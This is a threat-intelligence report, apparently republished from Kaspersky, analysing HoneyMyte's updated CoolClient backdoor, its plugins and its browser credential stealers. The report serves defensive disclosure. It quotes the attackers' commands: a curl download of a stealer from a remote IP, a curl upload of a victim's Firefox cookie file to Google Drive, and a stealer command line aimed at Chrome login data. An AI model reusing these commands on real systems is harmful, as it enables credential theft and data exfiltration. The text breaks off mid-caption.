{"id":836,"date":"2026-01-27T09:00:36","date_gmt":"2026-01-27T09:00:36","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/"},"modified":"2026-01-27T09:00:36","modified_gmt":"2026-01-27T09:00:36","slug":"honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/01\/27\/honeymyte-updates-coolclient-and-deploys-multiple-stealers-in-recent-campaigns\/","title":{"rendered":"HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns"},"content":{"rendered":"<div>\n<p><img width=\"990\" height=\"400\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26190932\/SL-HoneyMyte-CoolClient-featured-990x400.jpg\" class=\"attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image\" alt=\"\" decoding=\"async\" loading=\"lazy\"><\/p>\n<p>Over the past few years, we\u2019ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group\u2019s campaigns were government entities.<\/p>\n<p>As an APT group, HoneyMyte uses a variety of sophisticated tools to achieve its goals. These tools include <a href=\"https:\/\/securelist.com\/honeymyte-kernel-mode-rootkit\/118590\/\" target=\"_blank\" rel=\"noopener\">ToneShell<\/a>, PlugX, Qreverse and CoolClient backdoors, Tonedisk and SnakeDisk USB worms, among others. In 2025, we observed HoneyMyte updating its toolset by enhancing the CoolClient backdoor with new features, deploying several variants of a browser login data stealer, and using multiple scripts designed for data theft and reconnaissance.<\/p>\n<p>Additional information about this threat, including indicators of compromise, is available to customers of the <a href=\"https:\/\/www.kaspersky.com\/enterprise-security\/apt-intelligence-reporting\" target=\"_blank\" rel=\"noopener\">Kaspersky Intelligence Reporting Service<\/a>. If you are interested, please contact <a href=\"mailto:intelreports@kaspersky.com\" target=\"_blank\" rel=\"noopener\">intelreports@kaspersky.com<\/a>.<\/p>\n<h2 id=\"coolclient-backdoor\">CoolClient backdoor<\/h2>\n<p>An early version of the CoolClient backdoor was first discovered by <a href=\"https:\/\/news.sophos.com\/en-us\/2022\/11\/03\/family-tree-dll-sideloading-cases-may-be-related\/\" target=\"_blank\" rel=\"noopener\">Sophos<\/a> in 2022, and <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/c\/earth-preta-updated-stealthy-strategies.html\" target=\"_blank\" rel=\"noopener\">TrendMicro<\/a> later documented an updated version in 2023. Fast forward to our recent investigations, we found that CoolClient has evolved quite a bit, and the developers have added several new features to the backdoor. This updated version has been observed in multiple campaigns across Myanmar, Mongolia, Malaysia and Russia where it was often deployed as a secondary backdoor in addition to PlugX and <a href=\"https:\/\/securelist.com\/apt-luminousmoth\/103332\/\" target=\"_blank\" rel=\"noopener\">LuminousMoth<\/a> infections.<\/p>\n<p>In our observations, CoolClient was typically delivered alongside encrypted loader files containing encrypted configuration data, shellcode, and in-memory next-stage DLL modules. These modules relied on DLL sideloading as their primary execution method, which required a legitimate signed executable to load a malicious DLL. Between 2021 and 2025, the threat actor abused signed binaries from various software products, including BitDefender, VLC Media Player, Ulead PhotoImpact, and several Sangfor solutions.<\/p>\n<div id=\"attachment_118667\" style=\"width: 1977px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1.png\" class=\"magnificImage\"><img fetchpriority=\"high\" decoding=\"async\" aria-describedby=\"caption-attachment-118667\" class=\"size-full wp-image-118667\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1.png\" alt=\"Variants of CoolClient abusing different software for DLL sideloading (2021\u20132025)\" width=\"1967\" height=\"1080\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1.png 1967w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-300x165.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-1024x562.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-768x422.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-1536x843.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-637x350.png 637w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-740x406.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-510x280.png 510w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26144903\/honeymyte-updates1-800x439.png 800w\" sizes=\"(max-width: 1967px) 100vw, 1967px\"><\/a><\/p>\n<p id=\"caption-attachment-118667\" class=\"wp-caption-text\">Variants of CoolClient abusing different software for DLL sideloading (2021\u20132025)<\/p>\n<\/div>\n<p>The latest CoolClient version analyzed in this article abuses legitimate software developed by Sangfor. Below, you can find an overview of how it operates. It is worth noting that its behavior remains consistent across all variants, except for differences in the final-stage features.<\/p>\n<div id=\"attachment_118668\" style=\"width: 1930px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118668\" class=\"size-full wp-image-118668\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2.png\" alt=\"Overview of CoolClient execution flow\" width=\"1920\" height=\"1080\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2.png 1920w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-300x169.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-1024x576.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-768x432.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-1536x864.png 1536w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-800x450.png 800w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-622x350.png 622w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-740x416.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145006\/honeymyte-updates2-498x280.png 498w\" sizes=\"auto, (max-width: 1920px) 100vw, 1920px\"><\/a><\/p>\n<p id=\"caption-attachment-118668\" class=\"wp-caption-text\">Overview of CoolClient execution flow<\/p>\n<\/div>\n<p>However, it is worth noting that in another recent campaign involving this malware in Pakistan and Myanmar, we observed that HoneyMyte has introduced a newer variant of CoolClient that drops and executes a previously unseen rootkit. A separate report will be published in the future that covers the technical analysis and findings related to this CoolClient variant and the associated rootkit.<\/p>\n<h3 id=\"coolclient-functionalities\">CoolClient functionalities<\/h3>\n<p>In terms of functionality, CoolClient collects detailed system and user information. This includes the computer name, operating system version, total physical memory (RAM), network details (MAC and IP addresses), logged-in user information, and descriptions and versions of loaded driver modules. Furthermore, both old and new variants of CoolClient support file upload to the C2, file deletion, keylogging, TCP tunneling, reverse proxy listening, and plugin staging\/execution for running additional in-memory modules. These features are still present in the latest versions, alongside newly added functionalities.<\/p>\n<p>In this latest variant, CoolClient relies on several important files to function properly:<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Filename<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Sang.exe<\/td>\n<td>Legitimate Sangfor application abused for DLL sideloading.<\/td>\n<\/tr>\n<tr>\n<td>libngs.dll<\/td>\n<td>Malicious DLL used to decrypt loader.dat and execute shellcode.<\/td>\n<\/tr>\n<tr>\n<td>loader.dat<\/td>\n<td>Encrypted file containing shellcode and a second-stage DLL. Parameter checker and process injection activity reside here.<\/td>\n<\/tr>\n<tr>\n<td>time.dat<\/td>\n<td>Encrypted configuration file.<\/td>\n<\/tr>\n<tr>\n<td>main.dat<\/td>\n<td>Encrypted file containing shellcode and a third-stage DLL. The core functionality resides here.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 id=\"parameter-modes-in-second-stage-dll\">Parameter modes in second-stage DLL<\/h3>\n<p>CoolClient typically requires three parameters to function properly. These parameters determine which actions the malware is supposed to perform. The following parameters are supported.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Parameter<\/strong><\/td>\n<td><strong>Actions<\/strong><\/td>\n<\/tr>\n<tr>\n<td>No parameter<\/td>\n<td>\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 CoolClient will launch a new process of itself with the install parameter. For example: Sang.exe install.<\/td>\n<\/tr>\n<tr>\n<td>install<\/td>\n<td>\n<ul>\n<li>CoolClient decrypts time.dat.<\/li>\n<li>Adds new key to the Run registry for persistence mechanism.<\/li>\n<li>Creates a process named write.exe.<\/li>\n<li>Decrypts and injects loader.dat into a newly created write.exe process.<\/li>\n<li>Checks for service control manager (SCM) access.<\/li>\n<li>Checks for multiple AV processes such as 360sd.exe, zhudongfangyu.exe and 360desktopservice64.exe.<\/li>\n<li>Installs a service named media_updaten and starts it.<\/li>\n<li>If the current user is in the Administrator group, creates a new process of itself with the passuac parameter to bypass UAC.<\/li>\n<\/ul>\n<\/td>\n<\/tr>\n<tr>\n<td>work<\/td>\n<td>\n<ul>\n<li>Creates a process named write.exe.<\/li>\n<li>Decrypts and injects loader.dat into a newly spawned write.exe process.<\/li>\n<\/ul>\n<\/td>\n<\/tr>\n<tr>\n<td>passuac<\/td>\n<td>\n<ul>\n<li>Bypasses UAC and performs privilege elevation.<\/li>\n<li>Checks if the machine runs Windows 10 or a later version.<\/li>\n<li>Impersonates svchost.exe process by spoofing PEB information.<\/li>\n<li>Creates a scheduled task named ComboxResetTask for persistence. The task executes the malware with the work parameter.<\/li>\n<li>Elevates privileges to admin by duplicating an access token from an existing elevated process.<\/li>\n<\/ul>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 id=\"final-stage-dll\">Final stage DLL<\/h3>\n<p>The <code>write.exe<\/code> process decrypts and launches the <code>main.dat<\/code> file, which contains the third (final) stage DLL. CoolClient\u2019s core features are implemented in this DLL. When launched, it first checks whether the keylogger, clipboard stealer, and HTTP proxy credential sniffer are enabled. If they are, CoolClient creates a new thread for each specific functionality. It is worth noting that the clipboard stealer and HTTP proxy credential sniffer are new features that weren\u2019t present in older versions.<\/p>\n<h4 id=\"clipboard-and-active-windows-monitor\">Clipboard and active windows monitor<\/h4>\n<p>A new feature introduced in CoolClient is clipboard monitoring, which leverages functions that are typically abused by clipboard stealers, such as <code>GetClipboardData<\/code> and <code>GetWindowTextW<\/code>, to capture clipboard information.<\/p>\n<p>CoolClient also retrieves the window title, process ID and current timestamp of the user\u2019s active window using the <code>GetWindowTextW API<\/code>. This information enables the attackers to monitor user behavior, identify which applications are in use, and determine the context of data copied at a given moment.<\/p>\n<p>The clipboard contents and active window information are encrypted using a simple XOR operation with the byte key <code>0xAC<\/code>, and then written to a file located at <code>C:ProgramDataAppxProvisioning.xml<\/code>.<\/p>\n<h4 id=\"http-proxy-credential-sniffer\">HTTP proxy credential sniffer<\/h4>\n<p>Another notable new functionality is CoolClient\u2019s ability to extract HTTP proxy credentials from the host\u2019s HTTP traffic packets. To do so, the malware creates dedicated threads to intercept and parse raw network traffic on each local IP address. Once it is able to intercept and parse the traffic, CoolClient starts extracting proxy authentication credentials from HTTP traffic intercepted by the malware\u2019s packet sniffer.<\/p>\n<p>The function operates by analyzing the raw TCP payload to locate the <code>Proxy-Connection<\/code> header and ensure the packet is relevant. It then looks for the <code>Proxy-Authorization<\/code>: Basic header, extracts and decodes the Base64-encoded credential and saves it in memory to be sent later to the C2.<\/p>\n<div id=\"attachment_118669\" style=\"width: 914px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118669\" class=\"size-full wp-image-118669\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3.png\" alt=\"Function used to find and extract Base64-encoded credentials from HTTP proxy-authorization headers\" width=\"904\" height=\"830\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3.png 904w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3-300x275.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3-768x705.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3-381x350.png 381w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3-740x679.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3-305x280.png 305w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145641\/honeymyte-updates3-800x735.png 800w\" sizes=\"auto, (max-width: 904px) 100vw, 904px\"><\/a><\/p>\n<p id=\"caption-attachment-118669\" class=\"wp-caption-text\">Function used to find and extract Base64-encoded credentials from HTTP proxy-authorization headers<\/p>\n<\/div>\n<h3 id=\"c2-command-handler\">C2 command handler<\/h3>\n<p>The latest CoolClient variant uses TCP as the main C2 communication protocol by default, but it also has the option to use UDP, similar to the previous variant. Each incoming payload begins with a four-byte magic value to identify the command family. However, if the command is related to downloading and running a plugin, this value is absent. If the client receives a packet without a recognized magic value, it switches to plugin mode (mechanism used to receive and execute plugin modules in memory) for command processing.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Magic value<\/strong><\/td>\n<td><strong>Command category<\/strong><\/td>\n<\/tr>\n<tr>\n<td>CC BB AA FF<\/td>\n<td>Beaconing, status update, configuration.<\/td>\n<\/tr>\n<tr>\n<td>CD BB AA FF<\/td>\n<td>Operational commands such as tunnelling, keylogging and file operations.<\/td>\n<\/tr>\n<tr>\n<td>No magic value<\/td>\n<td>Receive and execute plugin module in memory.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4 id=\"0xffaabbcc-beacon-and-configuration-commands\">0xFFAABBCC \u2013 Beacon and configuration commands<\/h4>\n<p>Below is the command menu to manage client status and beaconing:<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Command ID<\/strong><\/td>\n<td><strong>Action<\/strong><\/td>\n<\/tr>\n<tr>\n<td>0x0<\/td>\n<td>Send beacon connection<\/td>\n<\/tr>\n<tr>\n<td>0x1<\/td>\n<td>Update beacon timestamp<\/td>\n<\/tr>\n<tr>\n<td>0x2<\/td>\n<td>Enumerate active user sessions<\/td>\n<\/tr>\n<tr>\n<td>0x3<\/td>\n<td>Handle incoming C2 command<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4 id=\"0xffaabbcd-operational-commands\">0xFFAABBCD \u2013 Operational commands<\/h4>\n<p>This command group implements functionalities such as data theft, proxy setup, and file manipulation. The following is a breakdown of known subcommands:<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Command ID<\/strong><\/td>\n<td><strong>Action<\/strong><\/td>\n<\/tr>\n<tr>\n<td>0x0<\/td>\n<td>Set up reverse tunnel connection<\/td>\n<\/tr>\n<tr>\n<td>0x1<\/td>\n<td>Send data through tunnel<\/td>\n<\/tr>\n<tr>\n<td>0x2<\/td>\n<td>Close tunnel connection<\/td>\n<\/tr>\n<tr>\n<td>0x3<\/td>\n<td>Set up reverse proxy<\/td>\n<\/tr>\n<tr>\n<td>0x4<\/td>\n<td>Shut down a specific socket<\/td>\n<\/tr>\n<tr>\n<td>0x6<\/td>\n<td>List files in a directory<\/td>\n<\/tr>\n<tr>\n<td>0x7<\/td>\n<td>Delete file<\/td>\n<\/tr>\n<tr>\n<td>0x8<\/td>\n<td>Set up keylogger<\/td>\n<\/tr>\n<tr>\n<td>0x9<\/td>\n<td>Terminate keylogger thread<\/td>\n<\/tr>\n<tr>\n<td>0xA<\/td>\n<td>Get clipboard data<\/td>\n<\/tr>\n<tr>\n<td>0xB<\/td>\n<td>Install clipboard and active windows monitor<\/td>\n<\/tr>\n<tr>\n<td>0xC<\/td>\n<td>Turn off clipboard and active windows monitor<\/td>\n<\/tr>\n<tr>\n<td>0xD<\/td>\n<td>Read and send file<\/td>\n<\/tr>\n<tr>\n<td>0xE<\/td>\n<td>Delete file<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"coolclient-plugins\">CoolClient plugins<\/h2>\n<p>CoolClient supports multiple plugins, each dedicated to a specific functionality. Our recent findings indicate that the HoneyMyte group actively used CoolClient in campaigns targeting Mongolia, where the attackers pushed and executed a plugin named <code>FileMgrS.dll<\/code> through the C2 channel for file management operations.<\/p>\n<p>Further sample hunting in our telemetry revealed two additional plugins: one providing remote shell capability (<code>RemoteShellS.dll<\/code>), and another focused on service management (<code>ServiceMgrS.dll<\/code>).<\/p>\n<h3 id=\"servicemgrs-dll-service-management-plugin\">ServiceMgrS.dll \u2013 Service management plugin<\/h3>\n<p>This plugin is used to manage services on the victim host. It can enumerate all services, create new services, and even delete existing ones. The following table lists the command IDs and their respective actions.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Command ID<\/strong><\/td>\n<td><strong>Action<\/strong><\/td>\n<\/tr>\n<tr>\n<td>0x0<\/td>\n<td>Enumerate services<\/td>\n<\/tr>\n<tr>\n<td>0x1 \/ 0x4<\/td>\n<td>Start or resume service<\/td>\n<\/tr>\n<tr>\n<td>0x2<\/td>\n<td>Stop service<\/td>\n<\/tr>\n<tr>\n<td>0x3<\/td>\n<td>Pause service<\/td>\n<\/tr>\n<tr>\n<td>0x5<\/td>\n<td>Create service<\/td>\n<\/tr>\n<tr>\n<td>0x6<\/td>\n<td>Delete service<\/td>\n<\/tr>\n<tr>\n<td>0x7<\/td>\n<td>Set service to start automatically at boot<\/td>\n<\/tr>\n<tr>\n<td>0x8<\/td>\n<td>Set service to be launched manually<\/td>\n<\/tr>\n<tr>\n<td>0x9<\/td>\n<td>Set service to disabled<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 id=\"filemgrs-dll-file-management-plugin\">FileMgrS.dll \u2013 File management plugin<\/h3>\n<p>A few basic file operations are already supported in the operational commands of the main CoolClient implant, such as listing directory contents and deleting files. However, the dedicated file management plugin provides a full set of file management capabilities.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Command ID<\/strong><\/td>\n<td><strong>Action<\/strong><\/td>\n<\/tr>\n<tr>\n<td>0x0<\/td>\n<td>List drives and network resources<\/td>\n<\/tr>\n<tr>\n<td>0x1<\/td>\n<td>List files in folder<\/td>\n<\/tr>\n<tr>\n<td>0x2<\/td>\n<td>Delete file or folder<\/td>\n<\/tr>\n<tr>\n<td>0x3<\/td>\n<td>Create new folder<\/td>\n<\/tr>\n<tr>\n<td>0x4<\/td>\n<td>Move file<\/td>\n<\/tr>\n<tr>\n<td>0x5<\/td>\n<td>Read file<\/td>\n<\/tr>\n<tr>\n<td>0x6<\/td>\n<td>Write data to file<\/td>\n<\/tr>\n<tr>\n<td>0x7<\/td>\n<td>Compress file or folder into ZIP archive<\/td>\n<\/tr>\n<tr>\n<td>0x8<\/td>\n<td>Execute file<\/td>\n<\/tr>\n<tr>\n<td>0x9<\/td>\n<td>Download and execute file using certutil<\/td>\n<\/tr>\n<tr>\n<td>0xA<\/td>\n<td>Search for file<\/td>\n<\/tr>\n<tr>\n<td>0xB<\/td>\n<td>Send search result<\/td>\n<\/tr>\n<tr>\n<td>0xC<\/td>\n<td>Map network drive<\/td>\n<\/tr>\n<tr>\n<td>0xD<\/td>\n<td>Set chunk size for file transfers<\/td>\n<\/tr>\n<tr>\n<td>0xF<\/td>\n<td>Bulk copy or move<\/td>\n<\/tr>\n<tr>\n<td>0x10<\/td>\n<td>Get file metadata<\/td>\n<\/tr>\n<tr>\n<td>0x11<\/td>\n<td>Set file metadata<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 id=\"remoteshells-dll-remote-shell-plugin\">RemoteShellS.dll \u2013 Remote shell plugin<\/h3>\n<p>Based on our analysis of the main implant, the C2 command handler did not implement remote shell functionality. Instead, CoolClient relied on a dedicated plugin to enable this capability. This plugin spawns a hidden <code>cmd.exe<\/code> process, redirecting standard input and output through pipes, which allows the attacker to send commands into the process and capture the resulting output. This output is then forwarded back to the C2 server for remote interaction.<\/p>\n<div id=\"attachment_118670\" style=\"width: 791px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145946\/honeymyte-updates4.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118670\" class=\"size-full wp-image-118670\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145946\/honeymyte-updates4.png\" alt=\"CoolClient plugin that spawns cmd.exe with redirected I\/O and forwards command output to C2\" width=\"781\" height=\"257\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145946\/honeymyte-updates4.png 781w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145946\/honeymyte-updates4-300x99.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145946\/honeymyte-updates4-768x253.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26145946\/honeymyte-updates4-740x244.png 740w\" sizes=\"auto, (max-width: 781px) 100vw, 781px\"><\/a><\/p>\n<p id=\"caption-attachment-118670\" class=\"wp-caption-text\">CoolClient plugin that spawns cmd.exe with redirected I\/O and forwards command output to C2<\/p>\n<\/div>\n<h2 id=\"browser-login-data-stealer\">Browser login data stealer<\/h2>\n<p>While investigating suspicious ToneShell backdoor traffic originating from a host in Thailand, we discovered that the HoneyMyte threat actor had downloaded and executed a malware sample intended to extract saved login credentials from the Chrome browser as part of their post-exploitation activities. We will refer to this sample as Variant A. On the same day, the actor executed a separate malware sample (Variant B) targeting credentials stored in the Microsoft Edge browser. Both samples can be considered part of the same malware family.<\/p>\n<p>During a separate threat hunting operation focused on HoneyMyte\u2019s QReverse backdoor, we retrieved another variant of a Chrome credential parser (Variant C) that exhibited significant code similarities to the sample used in the aforementioned ToneShell campaign.<\/p>\n<p>The malware was observed in countries such as Myanmar, Malaysia, and Thailand, with a particular focus on the government sector.<\/p>\n<p>The following table shows the variants of this browser credential stealer employed by HoneyMyte.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Variant<\/strong><\/td>\n<td><strong>Targeted browser(s)<\/strong><\/td>\n<td><strong>Execution method<\/strong><\/td>\n<td><strong>MD5 hash<\/strong><\/td>\n<\/tr>\n<tr>\n<td>A<\/td>\n<td>Chrome<\/td>\n<td>Direct execution (PE32)<\/td>\n<td>1A5A9C013CE1B65ABC75D809A25D36A7<\/td>\n<\/tr>\n<tr>\n<td>B<\/td>\n<td>Edge<\/td>\n<td>Direct execution (PE32)<\/td>\n<td>E1B7EF0F3AC0A0A64F86E220F362B149<\/td>\n<\/tr>\n<tr>\n<td>C<\/td>\n<td>Chromium-based browsers<\/td>\n<td>DLL side-loading<\/td>\n<td>DA6F89F15094FD3F74BA186954BE6B05<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>These stealers may be part of a new malware toolset used by HoneyMyte during post-exploitation activities.<\/p>\n<h3 id=\"initial-infection\">Initial infection<\/h3>\n<p>As part of post-exploitation activity involving the ToneShell backdoor, the threat actor initially executed the Variant A stealer, which targeted Chrome credentials. However, we were unable to determine the exact delivery mechanism used to deploy it.<\/p>\n<p>A few minutes later, the threat actor executed a command to download and run the Variant B stealer from a remote server. This variant specifically targeted Microsoft Edge credentials.<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">curl  hxxp:\/\/45.144.165[.]65\/BUIEFuiHFUEIuioKLWENFUoi878UIESf\/MUEWGHui897hjkhsjdkHfjegfdh\/67jksaebyut8seuhfjgfdgdfhet4SEDGF\/Tools\/getlogindataedge.exe -o \"C:users[username]librariesgetloginedge.exe\"<\/pre>\n<p>\nWithin the same hour that Variant B was downloaded and executed, we observed the threat actor issue another command to exfiltrate the Firefox browser cookie file (cookies.sqlite) to Google Drive using a <code>curl<\/code> command.<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">curl  -X POST -L -H \"Authorization: Bearer ya29.a0Ad52N3-ZUcb-ixQT_Ts1MwvXsO9JwEYRujRROo-vwqmSW006YxrlFSRjTuUuAK-u8UiaQt7v0gQbjktpFZMp65hd2KBwnY2YdTXYAKhktWi-v1LIaEFYzImoO7p8Jp01t29_3JxJukd6IdpTLPdXrKINmnI9ZgqPTWicWN4aCgYKAQ4SARASFQHGX2MioNQPPZN8EkdbZNROAlzXeQ0174\"  -F \"metadata={name :'8059cookies.sqlite'};type=application\/json;charset=UTF-8\" -F \"file=@\"$appdataMozillaFirefoxProfilesi6bv8i9n.default-releasecookies.sqlite\";type=application\/zip\" -k \"https:\/\/www.googleapis.com\/upload\/drive\/v3\/files?uploadType=multipart\"<\/pre>\n<\/p>\n<h3 id=\"variant-c-analysis\">Variant C analysis<\/h3>\n<p>Unlike Variants A and B, which use hardcoded file paths, the Variant C stealer accepts two runtime arguments: file paths to the browser\u2019s <code>Login Data<\/code> and <code>Local State<\/code> files. This provides greater flexibility and enables the stealer to target any Chromium-based browser such as Chrome, Edge, Brave, or Opera, regardless of the user profile or installation path. An example command used to execute Variant C is as follows:<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">Jarte.exe \"C:Users[username]AppDataLocalGoogleChromeUser DataDefaultLogin Data\" \"C:Users[username]AppDataLocalGoogleChromeUser DataLocal State\"<\/pre>\n<p>\nIn this context, the <code>Login Data<\/code> file is an SQLite database that stores saved website login credentials, including usernames and AES-encrypted passwords. The <code>Local State<\/code> file is a JSON-formatted configuration file containing browser metadata, with the most important value being <code>encrypted_key<\/code>, a Base64-encoded AES key. It is required to decrypt the passwords stored in the <code>Login Data<\/code> database and is also encrypted.<\/p>\n<p>When executed, the malware copies the <code>Login Data<\/code> file to the user\u2019s temporary directory as <code>chromeTmp<\/code>.<\/p>\n<div id=\"attachment_118671\" style=\"width: 1154px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-118671\" class=\"size-full wp-image-118671\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5.png\" alt=\"Function that copies Chrome browser login data into a temporary file (chromeTmp) for exfiltration\" width=\"1144\" height=\"705\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5.png 1144w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5-300x185.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5-1024x631.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5-768x473.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5-568x350.png 568w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5-740x456.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5-454x280.png 454w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/01\/26150730\/honeymyte-updates5-800x493.png 800w\" sizes=\"auto, (max-width: 1144px) 100vw, 1144px\"><\/a><\/p>\n<p id=\"caption-attachment-118671\" class=\"wp-caption-text\">Function that copies Chrome browser login data into a temporary file (chromeTmp) for 